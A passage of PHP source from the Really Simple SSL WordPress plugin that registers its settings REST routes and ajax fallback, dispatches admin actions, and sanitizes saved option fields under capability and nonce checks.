rsssl_override_wordpress_svg_size() { echo '<style> #adminmenu .toplevel_page_really-simple-security div.wp-menu-image.svg { background-size: 23px auto !important; } </style>'; } /** * @return void * * Set title of RSSSL admin page */ function rsssl_set_admin_page_title() { global $title; $title = __( "Security", "really-simple-ssl" ); } /** * Render the settings page */ function rsssl_settings_page() { if ( ! rsssl_user_can_manage()) { return; } ?> <div id="really-simple-ssl" class="rsssl"></div> <div id="really-simple-ssl-modal"></div> <?php } /** * If the rest api is blocked, the code will try an admin ajax call as fall back. * * @return void */ function rsssl_rest_api_fallback() { $response = $data = []; $error = $action = $test = $do_action = false; if ( ! rsssl_user_can_manage()) { $error = true; } //if the site is using this fallback, we want to show a notice update_option('rsssl_ajax_fallback_active', time(), false); if (isset($_GET['rest_action'])) { $action = sanitize_text_field($_GET['rest_action']); if (strpos($action, 'reallysimplessl/v1/tests/') !== false) { $test = strtolower(str_replace('reallysimplessl/v1/tests/', '', $action)); } } $requestData = json_decode(file_get_contents('php://input'), true); if ($requestData) { $action = $requestData['path'] ?? false; $action = sanitize_text_field($action); $data = $requestData['data'] ?? false; if (strpos($action, 'reallysimplessl/v1/do_action/') !== false) { $do_action = strtolower(str_replace('reallysimplessl/v1/do_action/', '', $action)); } } if (!$error) { if (strpos($action, 'fields/get') !== false) { $response = rsssl_rest_api_fields_get(); } else if (strpos($action, 'fields/set') !== false) { $request = new WP_REST_Request(); $response = rsssl_rest_api_fields_set($request, $data); } else if ($test) { $request = new WP_REST_Request(); $data = $_GET['data'] ?? false; $data = json_decode(stripcslashes($data)); $data = (array)$data; $nonce = isset($_GET['nonce']) ? sanitize_text_field($_GET['nonce']) : false; $id = isset($_GET['id']) ? sanitize_text_field($_GET['id']) : false; $state = isset($_GET['state']) ? sanitize_title($_GET['state']) : false; $request->set_param('test', $test); $request->set_param('state', $state); $request->set_param('id', $id); $request->set_param('nonce', $nonce); //remove foreach ($_GET as $key => $value) { $data[$key] = sanitize_text_field($value); } $response = rsssl_run_test($request, $data); } elseif ($do_action) { $request = new WP_REST_Request(); $request->set_param('action', $do_action); $response = rsssl_do_action($request, $data); } } header("Content-Type: application/json"); echo json_encode($response); exit; } add_action('wp_ajax_rsssl_rest_api_fallback', 'rsssl_rest_api_fallback'); add_action('rest_api_init', 'rsssl_settings_rest_route', 10); function rsssl_settings_rest_route() { if (!rsssl_user_can_manage()) { return; } register_rest_route('reallysimplessl/v1', 'fields/get', array( 'methods' => 'GET', 'callback' => 'rsssl_rest_api_fields_get', 'permission_callback' => function () { return rsssl_user_can_manage(); } )); register_rest_route('reallysimplessl/v1', 'fields/set', array( 'methods' => 'POST', 'callback' => 'rsssl_rest_api_fields_set', 'permission_callback' => function () { return rsssl_user_can_manage(); } )); register_rest_route('reallysimplessl/v1', 'tests/(?P<test>[a-z\_\-]+)', array( 'methods' => 'GET', 'callback' => 'rsssl_run_test', 'permission_callback' => function () { return rsssl_user_can_manage(); } )); register_rest_route('reallysimplessl/v1', 'do_action/(?P<action>[a-z\_\-]+)', array( 'methods' => 'POST', 'callback' => 'rsssl_do_action', 'permission_callback' => function () { return rsssl_user_can_manage(); } )); } /** * Store SSL Labs result * @param array $data * * @return array */ function rsssl_store_ssl_labs($data) { if (!rsssl_user_can_manage()) { return []; } update_option('rsssl_ssl_labs_data', $data, false); return []; } function rsssl_remove_fallback_notice() { if (get_option('rsssl_ajax_fallback_active') !== false) { delete_option('rsssl_ajax_fallback_active'); } } /** * @param WP_REST_Request $request * @param array|bool $ajax_data * * @return void */ function rsssl_do_action($request, $ajax_data = false) { if (!rsssl_user_can_manage()) { return; } if (!$ajax_data) { rsssl_remove_fallback_notice(); } $action = sanitize_title($request->get_param('action')); $data = $ajax_data !== false ? $ajax_data : $request->get_params(); $nonce = $data['nonce']; if (!wp_verify_nonce($nonce, 'rsssl_nonce')) { return; } switch ($action) { case 'ssltest_get': $response = ['data' => get_option('rsssl_ssl_labs_data')]; break; case 'ssltest_run': $response = rsssl_ssltest_run($data); break; case 'store_ssl_labs': $response = rsssl_store_ssl_labs($data); break; case 'send_test_mail': $mailer = new rsssl_mailer(); $response = $mailer->send_test_mail(); break; case 'send_verification_mail': $mailer = new rsssl_mailer(); $response = $mailer->send_verification_mail( rsssl_get_option('notifications_email_address') ); break; case 'plugin_actions': $response = rsssl_plugin_actions($data); break; case 'clear_cache': $response = rsssl_clear_test_caches($data); break; case 'fix': $response = rsssl_fix($data); break; case 'otherpluginsdata': $response = rsssl_other_plugins_data(); break; case 'get_roles': $roles = rsssl_get_roles(); $response = []; $response['roles'] = $roles; break; case 'get_hosts': $response = []; if ( !class_exists('rsssl_le_hosts')) { require_once( rsssl_path . 'lets-encrypt/config/class-hosts.php'); $response['hosts'] = ( new rsssl_le_hosts() )->hosts; } else { $response['hosts'] = RSSSL_LE()->hosts->hosts; } break; default: $response = apply_filters("rsssl_do_action", [], $action, $data); } if (is_array($response)) { $response['request_success'] = true; } return $response; } /** * @param array $data * * @return array */ function rsssl_clear_test_caches($data) { if (!rsssl_user_can_manage()) { return []; } $cache_id = sanitize_title($data['cache_id']); do_action('rsssl_clear_test_caches', $data); return []; } /** * @param array $data * * @return array */ function rsssl_fix($data) { if (!rsssl_user_can_manage()) { return []; } $fix_id = sanitize_title($data['fix_id']); $output = []; $output = apply_filters('rsssl_run_fix', $output, $fix_id); return $output; } /** * Process plugin installation or activation actions * * @param array $data * * @return array */ function rsssl_plugin_actions($data) { if (!rsssl_user_can_manage()) { return []; } $slug = sanitize_title($data['slug']); $action = sanitize_title($data['pluginAction']); $installer = new rsssl_installer($slug); if ($action === 'download') { $installer->download_plugin(); } elseif ($action === 'activate') { $installer->activate_plugin(); } return rsssl_other_plugins_data($slug); } /** * Run a request to SSL Labs * * @param $data * * @return string */ function rsssl_ssltest_run( $data ) { if ( ! rsssl_user_can_manage() ) { return ''; } $url = $data['url']; $response = wp_safe_remote_get( $url ); $data = wp_remote_retrieve_body( $response ); if ( empty( $data ) ) { $data = [ 'errors' => 'Request failed, please try again.' ]; } return $data; } /** * @param WP_REST_Request $request * * @return array */ function rsssl_run_test($request, $ajax_data = false) { if (!rsssl_user_can_manage()) { return []; } if (!$ajax_data) { rsssl_remove_fallback_notice(); } $nonce = $request->get_param('nonce'); if (!wp_verify_nonce($nonce, 'rsssl_nonce')) { return []; } $data = $ajax_data !== false ? $ajax_data : $request->get_params(); $test = sanitize_title($request->get_param('test')); $state = $request->get_param('state'); $state = $state !== 'undefined' && $state !== 'false' ? $state : false; switch ($test) { case 'progressdata': $response = RSSSL()->progress->get(); break; case 'dismiss_task': $response = RSSSL()->progress->dismiss_task($state); break; default: $response = apply_filters("rsssl_run_test", [], $test, $data); } if (is_array($response)) { $response['request_success'] = true; } return $response; } /** * Get plugin data for other plugin section * @param string $slug * @return array */ function rsssl_other_plugins_data($slug = false) { if (!rsssl_user_can_manage()) { return []; } $plugins = array( [ 'slug' => 'burst-statistics', 'constant_free' => 'burst_version', 'constant_premium' => 'burst_pro', 'wordpress_url' => 'https://wordpress.org/plugins/burst-statistics/', 'upgrade_url' => 'https://burst-statistics.com/pricing?src=rsssl-plugin', 'title' => 'Burst Statistics - '. __("Self-hosted and privacy-friendly analytics tool.", 'really-simple-ssl'), ], [ 'slug' => 'complianz-gdpr', 'constant_free' => 'cmplz_plugin', 'constant_premium' => 'cmplz_premium', 'wordpress_url' => 'https://wordpress.org/plugins/complianz-gdpr/', 'upgrade_url' => 'https://complianz.io/pricing?src=rsssl-plugin', 'title' => __("Complianz - Consent Management as it should be", "really-simple-ssl"), ], [ 'slug' => 'complianz-terms-conditions', 'constant_free' => 'cmplz_tc_version', 'wordpress_url' => 'https://wordpress.org/plugins/complianz-terms-conditions/', 'upgrade_url' => 'https://complianz.io?src=rsssl-plugin', 'title' => 'Complianz - ' . __("Terms and Conditions", "really-simple-ssl"), ], ); foreach ($plugins as $index => $plugin) { $installer = new rsssl_installer($plugin['slug']); if (isset($plugin['constant_premium']) && defined($plugin['constant_premium'])) { $plugins[$index]['pluginAction'] = 'installed'; } else if (!$installer->plugin_is_downloaded() && !$installer->plugin_is_activated()) { $plugins[$index]['pluginAction'] = 'download'; } else if ($installer->plugin_is_downloaded() && !$installer->plugin_is_activated()) { $plugins[$index]['pluginAction'] = 'activate'; } else { if (isset($plugin['constant_premium'])) { $plugins[$index]['pluginAction'] = 'upgrade-to-premium'; } else { $plugins[$index]['pluginAction'] = 'installed'; } } } if ($slug) { foreach ($plugins as $key => $plugin) { if ($plugin['slug'] === $slug) { return $plugin; } } } return ['plugins' => $plugins]; } /** * List of allowed field types * @param $type * * @return mixed|string */ function rsssl_sanitize_field_type($type) { $types = [ 'hidden', 'license', 'database', 'checkbox', 'password', 'radio', 'text', 'textarea', 'number', 'email', 'select', 'host', 'permissionspolicy', 'learningmode', 'mixedcontentscan', 'vulnerablemeasures', 'LetsEncrypt', 'postdropdown', 'two_fa_roles', 'roles_enabled_dropdown', 'roles_dropdown', 'captcha', 'captcha_key', // 'two_fa_table', // 'verify_email', ]; if ( in_array( $type, $types, true ) ) { return $type; } return 'checkbox'; } /** * @param WP_REST_Request $request * @param array $ajax_data * * @return array */ function rsssl_rest_api_fields_set(WP_REST_Request $request, $ajax_data = false): array { if (!rsssl_user_can_manage()) { return []; } $fields = $ajax_data ?: $request->get_json_params(); //get the nonce $nonce = false; foreach ($fields as $index => $field) { if (isset($field['nonce'])) { $nonce = $field['nonce']; unset($fields[$index]); } } if (!wp_verify_nonce($nonce, 'rsssl_nonce')) { return []; } $config_fields = rsssl_fields(false); $config_ids = array_column($config_fields, 'id'); foreach ($fields as $index => $field) { $config_field_index = array_search($field['id'], $config_ids); $config_field = $config_fields[$config_field_index]; if ($config_field_index === false) { unset($fields[$index]); continue; } $type = rsssl_sanitize_field_type($field['type']); $field_id = sanitize_text_field($field['id']); $value = rsssl_sanitize_field($field['value'], $type, $field_id); //if an endpoint is defined, we use that endpoint instead if (isset($config_field['data_endpoint'])) { //the updateItemId allows us to update one specific item in a field set. $update_item_id = isset($field['updateItemId']) ? $field['updateItemId'] : false; $action = isset($field['action']) && $field['action'] === 'delete' ? 'delete' : 'update'; $endpoint = $config_field['data_endpoint']; if (is_array($endpoint)) { $main = $endpoint[0]; $class = $endpoint[1]; $function = $endpoint[2]; if (function_exists($main)) { $main()->$class->$function($value, $update_item_id, $action); } } else if (function_exists($endpoint)) { $endpoint($value, $update_item_id, $action); } unset($fields[$index]); continue; } $field['value'] = $value; $fields[$index] = $field; } if (is_multisite() && rsssl_is_networkwide_active()) { $options = get_site_option('rsssl_options', []); } else { $options = get_option('rsssl_options', []); } //build a new options array foreach ($fields as $field) { $prev_value = isset($options[$field['id']]) ? $options[$field['id']] : false; do_action("rsssl_before_save_option", $field['id'], $field['value'], $prev_value, $field['type']); $options[$field['id']] = apply_filters("rsssl_fieldvalue", $field['value'], $field['id'], $field['type']); } if (!empty($options)) { if (is_multisite() && rsssl_is_networkwide_active()) { update_site_option('rsssl_options', $options); } else { update_option('rsssl_options', $options); } } RSSSL()->admin->clear_admin_notices_cache(); do_action('rsssl_after_saved_fields', $fields ); foreach ( $fields as $field ) { do_action( "rsssl_after_save_field", $field['id'], $field['value'], $prev_value, $field['type'] ); } return [ 'success' => true, 'progress' => RSSSL()->progress->get(), 'fields' => rsssl_fields(true), ]; } /** * Update a rsssl option * @param string $name * @param mixed $value * * @return void */ function rsssl_update_option($name, $value) { if (!rsssl_user_can_manage()) { return; } $config_fields = rsssl_fields(false); $config_ids = array_column($config_fields, 'id'); $config_field_index = array_search($name, $config_ids); if ($config_field_index === false) { return; } $config_field = $config_fields[$config_field_index]; $type = $config_field['type'] ?? false; if (!$type) { return; } if (is_multisite() && rsssl_is_networkwide_active()) { $options = get_site_option('rsssl_options', []); } else { $options = get_option('rsssl_options', []); } if (!is_array($options)) $options = []; $prev_value = $options[$name] ?? false; $name = sanitize_text_field($name); $type = rsssl_sanitize_field_type($config_field['type']); $value = rsssl_sanitize_field($value, $type, $name); $value = apply_filters("rsssl_fieldvalue", $value, sanitize_text_field($name), $type); #skip if value wasn't changed if (isset($options[$name]) && $options[$name] === $value) { return; } $options[$name] = $value; if ( is_multisite() && rsssl_is_networkwide_active() ) { update_site_option( 'rsssl_options', $options ); } else { update_option( 'rsssl_options', $options ); } $config_field['value'] = $value; RSSSL()->admin->clear_admin_notices_cache(); do_action('rsssl_after_saved_fields',[$config_field] ); do_action( "rsssl_after_save_field", $name, $value, $prev_value, $type ); } /** * Get the rest api fields * @return array */ function rsssl_rest_api_fields_get() { if (!rsssl_user_can_manage()) { return []; } $output = array(); $fields = rsssl_fields(); foreach ($fields as $index => $field) { /** * Load data from source */ if (isset($field['data_source'])) { $data_source = $field['data_source']; if (is_array($data_source)) { $main = $data_source[0]; $class = $data_source[1]; $function = $data_source[2]; $field['value'] = []; if (function_exists($main)) { $field['value'] = $main()->$class->$function(); } } else if (function_exists($field['data_source'])) { $func = $field['data_source']; $field['value'] = $func(); } } $fields[$index] = $field; } $output['fields'] = $fields; $output['request_success'] = true; $output['progress'] = RSSSL()->progress->get(); return apply_filters('rsssl_rest_api_fields_get', $output); } /** * Sanitize a field * * @param mixed $value * @param string $type * @oaram string $id * * @return array|bool|int|string|void */ function rsssl_sanitize_field($value, string $type, string $id) { switch ($type) { case 'checkbox': case 'number': return (int)$value; case 'hidden': return sanitize_title($value); case 'select': case 'host': case 'text': case 'license': case 'password': case 'captcha_key': case 'postdropdown': return sanitize_text_field($value); case 'textarea': return wp_kses($value, array()); case 'multicheckbox': if (!is_array($value)) { $value = array($value); } return array_map('sanitize_text_field', $value); case 'email': return sanitize_email($value); case 'url': return esc_url_raw($value); case 'permissionspolicy': return rsssl_sanitize_permissions_policy($value, $type, $id); case 'learningmode': return rsssl_sanitize_datatable($value, $type, $id); case 'mixedcontentscan': return $value; case 'roles_dropdown': case 'roles_enabled_dropdown': case 'two_fa_roles': $value = !is_array($value) ? [] : $value; $roles = rsssl_get_roles(); foreach ($value as $index => $role) { if (! in_array( $role, $roles, true ) ) { unset($value[$index]); } } return $value; default: return sanitize_text_field($value); } } /** * Dedicated permission policy sanitization * * @param $value * @param $type * @param $field_name * * @return array|false */ function rsssl_sanitize_permissions_policy($value, $type, $field_name) { $possible_keys = apply_filters("rsssl_datatable_datatypes_$type", [ 'id' => 'string', 'title' => 'string', 'status' => 'boolean', ]); // Datatable array will look something like this, whith 0 the row index, and id, title the col indexes. // [0] => Array // ( // [id] => camera // [title] => Camera // [value] => () // [status] => 1/0 // ) //) $config_fields = rsssl_fields(false); //check if there is a default available $default = false; foreach ($config_fields as $config_field) { if ($config_field['id'] === $field_name) { $default = isset($config_field['default']) ? $config_field['default'] : false; } } $stored_ids = []; if (!is_array($value)) { return $default; } else { foreach ($value as $row_index => $row) { //check if we have invalid values if (is_array($row)) { foreach ($row as $column_index => $row_value) { if ($column_index === 'id' && $row_value === false) { unset($value[$column_index]); } } } //has to be an array. if (!is_array($row)) { if (isset($default[$row_index])) { $value[$row_index] = $default[$row_index]; } else { unset($value[$row_index]); } } foreach ($row as $col_index => $col_value) { if (!isset($possible_keys[$col_index])) { unset($value[$row_index][$col_index]); } else { $datatype = $possible_keys[$col_index]; switch ($datatype) { case 'string': $value[$row_index][$col_index] = sanitize_text_field($col_value); break; case 'int': case 'boolean': default: $value[$row_index][$col_index] = intval($col_value); break; } } } //Ensure that all required keys are set with at least an empty value foreach ($possible_keys as $key => $data_type) { if (!isset($value[$row_index][$key])) { $value[$row_index][$key] = false; } } } } //ensure that there are no duplicate ids foreach ($value as $index => $item) { if (in_array($item['id'], $stored_ids)) { unset($value[$index]); continue; } $stored_ids[] = $item['id']; } //if the default contains items not in the setting (newly added), add them. if (count($value) < count($default)) { foreach ($default as $def_row_index => $def_row) { //check if it is available in the array. If not, add if (!in_array($def_row['id'], $stored_ids)) { $value[] = $def_row; } } } return $value; } function rsssl_sanitize_datatable($value, $type, $field_name) { $possible_keys = apply_filters("rsssl_datatable_datatypes_$type", [ 'id' => 'string', 'title' => 'string', 'status' => 'boolean', ]); if (!is_array($value)) { return false; } else { foreach ($value as $row_index => $row) { //check if we have invalid values if (is_array($row)) { foreach ($row as $column_index => $row_value) { if ($column_index === 'id' && $row_value === false) { unset($value[$column_index]); } } } //has to be an array. if (!is_array($row)) { unset($value[$row_index]); } foreach ($row as $col_index => $col_value) { if (!isset($possible_keys[$col_index])) { unset($value[$row_index][$col_index]); } else { $datatype = $possible_keys[$col_index]; switch ($datatype) { case 'string': $value[$row_index][$col_index] = sanitize_text_field($col_value); break; case 'int': case 'boolean': default: $value[$row_index][$col_index] = intval($col_value); break; } } } //Ensure that all required keys are set with at least an empty value foreach ($possible_keys as $key => $data_type) { if (!isset($value[$row_index][$key])) { $value[$row_index][$key] = false; } } } } return $value; } /** * Check if the server side conditions apply * * @param array $conditions * * @return bool */ function rsssl_conditions_apply(array $conditions) { $defaults = ['relation' => 'AND']; $conditions = wp_parse_args($conditions, $defaults); $relation = $conditions['relation'] === 'AND' ? 'AND' : 'OR'; unset($conditions['relation']); $condition_applies = true; foreach ($conditions as $condition => $condition_value) { $invert = substr($condition, 1) === '!'; $condition = ltrim($condition, '!'); if (is_array($condition_value)) { $this_condition_applies = rsssl_conditions_apply($condition_value); } else { //check if it's a function if (substr($condition, -2) === '()') { $func = $condition; if (preg_match('/(.*)\(\)\-\>(.*)->(.*)/i', $func, $matches)) { $base = $matches[1]; $class = $matches[2]; $func = $matches[3]; $func = str_replace('()', '', $func); $this_condition_applies = call_user_func(array($base()->{$class}, $func)) === $condition_value; } else { $func = str_replace('()', '', $func); $this_condition_applies = $func() === $condition_value; } } else { $var = $condition; if (preg_match('/(.*)\(\)\-\>(.*)->(.*)/i', $var, $matches)) { $base = $matches[1]; $class = $matches[2]; $var = $matches[3]; $this_condition_applies = $base()->{$class}->_get($var) === $condition_value; } else { $this_condition_applies = rsssl_get_option($var) === $condition_value; } } if ($invert) { $this_condition_applies = !$this_condition_applies; } } if ($relation === 'AND') { $condition_applies = $condition_applies && $this_condition_applies; } else { $condition_applies = $condition_applies || $this_condition_applies; } } return $condition_applies; } /** * Fetch all user roles. * * Tries to get roles from cache first. If roles are not in cache, it fetches them and stores them in cache. * * @return array An array of roles, each role being an associative array with 'label' and 'value' keys. */ function rsssl_get_roles( ): array { if ( ! rsssl_admin_logged_in() ) { return []; } global $wp_roles; // Try to get roles from cache $roles = wp_cache_get( 'rsssl_roles' ); // If roles are not in cache, fetch and set cache if ( ! $roles ) { // Just return the names, not the capabilities $roles_names = array_keys( $wp_roles->roles ); // Extract unique role values from the role names $roles = array_values( array_unique( $roles_names )); // Set the roles in cache for future use wp_cache_set( 'rsssl_roles', $roles ); } return $roles; } /** * @param $response * @param $user * @param $request * * @return mixed * * Add user roles to /users endpoint */ function rsssl_add_user_role_to_api_response( $response, $user, $request ) { if ( rsssl_is_logged_in_rest() ) { $data = $response->get_data(); $data['roles'] = $user->roles; $response->set_data( $data ); } return $response; } add_filter( 'rest_prepare_user', 'rsssl_add_user_role_to_api_response', 10, 3 );